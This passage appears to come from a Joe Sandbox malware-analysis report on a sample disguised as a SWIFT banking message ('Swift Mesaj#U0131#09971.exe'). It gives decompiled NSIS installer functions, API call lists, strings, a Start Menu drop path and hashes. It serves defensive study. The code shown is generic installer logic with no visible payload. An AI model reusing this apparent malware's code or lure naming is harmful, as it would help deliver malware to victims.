									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x433eb8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x434f8c - _t136;
										if( *0x434f8c == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x42ba18 = 1;
											L21:
											_push(0x78);
											L22:
											E004041F0();
											goto L26;
										}
										E0040140B(_t130);
										 *0x42ba18 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x433eb8);
						 *0x433eb8 = _a12;
						L58:
						_t144 =  *0x42f248 - _t136; // 0x0
						if(_t144 == 0 &&  *0x433eb8 != _t136) {
							ShowWindow(_t128, 0xa);
							 *0x42f248 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403d47
0x00403d50
0x00403e91
0x00403e95
0x00403e99
0x00403e9b
0x00403ea0
0x00403eab
0x00403eb6
0x00403ebb
0x00403ebd
0x00403ebf
0x00403ec2
0x00403ec7
0x00403ed5
0x00403ee2
0x00403ee9
0x00403ee9
0x00403eea
0x00403eea
0x00403eef
0x00403ef5
0x00403efc
0x00403f02
0x00403f04
0x00403f44
0x00403f49
0x00403f4e
0x00403f4e
0x00403f53
0x00403f5c
0x00403f5e
0x00403f63
0x00403f69
0x00403f6d
0x00403f6d
0x00403f72
0x00403f78
0x00000000
0x00000000
0x00403f83
0x00403f89
0x00000000
0x00000000
0x00403f92
0x00403f9a
0x00403f9f
0x00403fa2
0x00403fa8
0x00403fad
0x00403fb0
0x00403fb6
0x00403fbb
0x00403fbe
0x00403fc4
0x00403fcc
0x00403fd2
0x00403fd8
0x00403fdc
0x00403fe3
0x00403fe3
0x00403fe3
0x00403fed
0x00403fff
0x0040400b
0x00404010
0x0040401a
0x00404020
0x00404022
0x00404027
0x00404024
0x00404024
0x00404024
0x00404037
0x0040404f
0x00404051
0x00404057
0x0040406c
0x00404059
0x00404062
0x00404064
0x00404064
0x00404072
0x00404083
0x00404099
0x004040a0
0x004040a6
0x004040aa
0x004040af
0x004040b1
0x00000000
0x004040b7
0x004040b7
0x004040b9
0x00000000
0x00000000
0x004040bf
0x004040c3
0x004040e8
0x004040ee
0x004040f4
0x004040f6
0x00000000
0x00000000
0x0040411c
0x00404122
0x00404124
0x00404129
0x00000000
0x00000000
0x0040412f
0x00404132
0x00404135
0x0040414c
0x00404158
0x00404171
0x00404177
0x0040417b
0x00404180
0x00404186
0x00000000
0x00000000
0x00404190
0x0040419b
0x00000000
0x0040419b
0x004040c5
0x004040cb
0x00000000
0x00000000
0x004040d1
0x004040d7
0x00000000
0x00000000
0x00000000
0x004040dd
0x004040b1
0x004041a8
0x004041b4
0x004041bb
0x00000000
0x00403f06
0x00403f06
0x00403f09
0x00403f3c
0x00403f3c
0x00403f3e
0x00000000
0x00000000
0x00000000
0x00403f3e
0x00403f0b
0x00403f0f
0x00403f14
0x00403f16
0x00000000
0x00000000
0x00403f26
0x00403f2e
0x00000000
0x00403f34
0x00403d62
0x00403d62
0x00403d66
0x00403d6b
0x00403d7a
0x00403d7a
0x00403d83
0x00403d8c
0x00403d97
0x00403d97
0x00403da3
0x00403dbf
0x00403dc2
0x00403dd5
0x00403ddb
0x00403e7e
0x00000000
0x00403e87
0x00403de1
0x00403dee
0x00403df0
0x00403df2
0x00403e11
0x00403e11
0x00403e14
0x00403e19
0x00403e1c
0x00403e2c
0x00403e2d
0x00403e2f
0x00403e65
0x00403e78
0x00000000
0x00403e78
0x00403e31
0x00403e37
0x00403e50
0x00403e55
0x00403e57
0x00000000
0x00000000
0x00403e59
0x00403e45
0x00403e45
0x00403e47
0x00403e47
0x00000000
0x00403e47
0x00403e3a
0x00403e3f
0x00000000
0x00403e3f
0x00403e1e
0x00403e24
0x00000000
0x00000000
0x00403e26
0x00000000
0x00403e26
0x00403e16
0x00000000
0x00403e16
0x00403dfc
0x00403e03
0x00403e09
0x00403e0b
0x00000000
0x00000000
0x00000000
0x00403e0b
0x00403dc7
0x00000000
0x00403da5
0x00403dab
0x00403db5
0x004041c1
0x004041c1
0x004041c7
0x004041d4
0x004041da
0x004041da
0x004041e4
0x00000000
0x004041e4
0x00403da3

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
ShowWindow.USER32(?), ref: 00403D97
DestroyWindow.USER32 ref: 00403DAB
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
GetDlgItem.USER32(?,?), ref: 00403DE8
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
IsWindowEnabled.USER32(00000000), ref: 00403E03
GetDlgItem.USER32(?,00000001), ref: 00403EB1
GetDlgItem.USER32(?,00000002), ref: 00403EBB
SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
GetDlgItem.USER32(?,00000003), ref: 00403FCC
ShowWindow.USER32(00000000,?), ref: 00403FED
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
EnableWindow.USER32(?,?), ref: 0040401A
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
EnableMenuItem.USER32(00000000), ref: 00404037
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
SetWindowTextW.USER32(?,0042D248), ref: 004040A0
ShowWindow.USER32(?,0000000A), ref: 004041D4

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403990 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403990(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				signed short _t73;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434ef4;
				_t22 = E0040665C(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d248;
					L"1033" = 0x30;
					 *0x441002 = 0x78;
					 *0x441004 = 0;
					E00406150(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d248, 0);
					__eflags =  *0x42d248;
					if(__eflags == 0) {
						E00406150(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083CC, 0x42d248, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					_t73 =  *_t22(); // executed
					E004061C9(L"1033", _t73 & 0x0000ffff);
				}
				E00403C66(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra";
				 *0x434f80 =  *0x434efc & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405C5B(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Ydervgg\\Superassume\\dodecaheddra") != 0) {
					L16:
					if(E00405C5B(_t98, _t86) == 0) {
						E004062A4(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x434ee0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ec8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403C66(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E004053B9(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433eac;
								if( *0x433eac == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d228, 5); // executed
							_t39 = E004065EC("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004065EC("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433e80);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433e80);
								 *0x433ea4 = _t87;
								RegisterClassW(0x433e80);
							}
							_t44 = DialogBoxParamW( *0x434ee0,  *0x433ec0 + 0x00000069 & 0x0000ffff, 0, E00403D3E, 0); // executed
							E004038E0(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434ee0;
						 *0x433e84 = E00401000;
						 *0x433e90 =  *0x434ee0;
						 *0x433e94 = _t30;
						 *0x433ea4 = 0x40a380;
						if(RegisterClassW(0x433e80) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d228 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434ee0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432e80;
					E00406150(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432e80, 0);
					_t63 =  *0x432e80; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432e82;
						 *((short*)(E00405B80(0x432e82, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406282(_t86, E00405B53(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B9F(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403996
0x0040399f
0x004039a6
0x004039a8
0x004039bc
0x004039ce
0x004039d7
0x004039e0
0x004039e7
0x004039ec
0x004039f3
0x00403a06
0x00403a06
0x00403a11
0x004039aa
0x004039aa
0x004039b5
0x004039b5
0x00403a16
0x00403a20
0x00403a29
0x00403a2e
0x00403a3f
0x00403ad1
0x00403ad9
0x00403ae2
0x00403ae2
0x00403af8
0x00403afe
0x00403b0c
0x00403b8d
0x00403b95
0x00403b9f
0x00403ba4
0x00403baa
0x00403c34
0x00403c39
0x00403c3b
0x00403c57
0x00000000
0x00403c57
0x00403c3d
0x00403c43
0x00403c4b
0x00403c4b
0x00000000
0x00403c43
0x00403bb8
0x00403bc3
0x00403bc8
0x00403bca
0x00403bd1
0x00403bd1
0x00403bdc
0x00403be4
0x00403be6
0x00403be8
0x00403bf1
0x00403bf4
0x00403bfa
0x00403bfa
0x00403c19
0x00403c2a
0x00000000
0x00403c2f
0x00403b97
0x00403b99
0x00000000
0x00403b0e
0x00403b0e
0x00403b1a
0x00403b24
0x00403b2a
0x00403b2f
0x00403b3e
0x00403c5c
0x00403c5c
0x00000000
0x00403c5c
0x00403b4d
0x00403b88
0x00000000
0x00403b88
0x00403a45
0x00403a45
0x00403a48
0x00403a4a
0x00000000
0x00000000
0x00403a58
0x00403a6a
0x00403a6f
0x00403a78
0x00000000
0x00000000
0x00403a7e
0x00403a80
0x00403a8d
0x00403a8d
0x00403a96
0x00403a9c
0x00403ac4
0x00403acc
0x00000000
0x00403aae
0x00403aaf
0x00403ab8
0x00403abe
0x00403abf
0x00000000
0x00403abf
0x00403aba
0x00403abc
0x00000000
0x00000000
0x00000000
0x00403abc
0x00403a9c

APIs

Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,76203420,"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe",00000000), ref: 004039AA

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra), ref: 00403AF8
RegisterClassW.USER32(00433E80), ref: 00403B35
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
ShowWindow.USER32(00000005,00000000), ref: 00403BB8
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
RegisterClassW.USER32(00433E80), ref: 00403BFA
DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19

Strings

Call, xrefs: 00403A58, 00403A61, 00403A6F, 00403ABE, 00403AC4
RichEdit, xrefs: 00403BEB
Control Panel\Desktop\ResourceLocale, xrefs: 004039C4
RichEd32, xrefs: 00403BCC
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra, xrefs: 00403A20, 00403A28, 00403ACB, 00403AD1, 00403AE1
RichEdit20W, xrefs: 00403BDC, 00403BE2
RichEd20, xrefs: 00403BBE
"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 00403994
.DEFAULT\Control Panel\International, xrefs: 004039FC
C:\Users\user\AppData\Local\Temp\, xrefs: 0040399C
1033, xrefs: 004039B0, 00403A0C
_Nb, xrefs: 00403B14, 00403B7C
.exe, xrefs: 00403A9E

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-474042595
Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\Swift Mesaj#U0131#09971.exe";
				 *0x434ef0 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\Swift Mesaj#U0131#09971.exe", 0x400);
				_t89 = E00405D74(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406282(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406282(0x443000, E00405B9F(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x422a04 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x434ef8 - _t82;
					if( *0x434ef8 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040332B( *0x434ef8 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434ef4 = _t94;
							 *0x434efc =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f00 =  *0x434f00 + 1;
								__eflags =  *0x434f00;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D2F(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040332B( *0x4169f8);
					_t65 = E00403315( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434ef8) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403315(0x422a08, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434ef8;
						if( *0x434ef8 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D2F( &_v44, 0x422a08, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x4169f8; // 0x5c9bd
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434ef8 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x422a04; // 0x5c9c1
						if(__eflags < 0) {
							_v12 = E0040674F(_v12, 0x422a08, _t90);
						}
						 *0x4169f8 =  *0x4169f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

Inst, xrefs: 00402FA6
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
Null, xrefs: 00402FB8
"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 00402EC1
C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
soft, xrefs: 00402FAF
C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
Error launching installer, xrefs: 00402F11

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
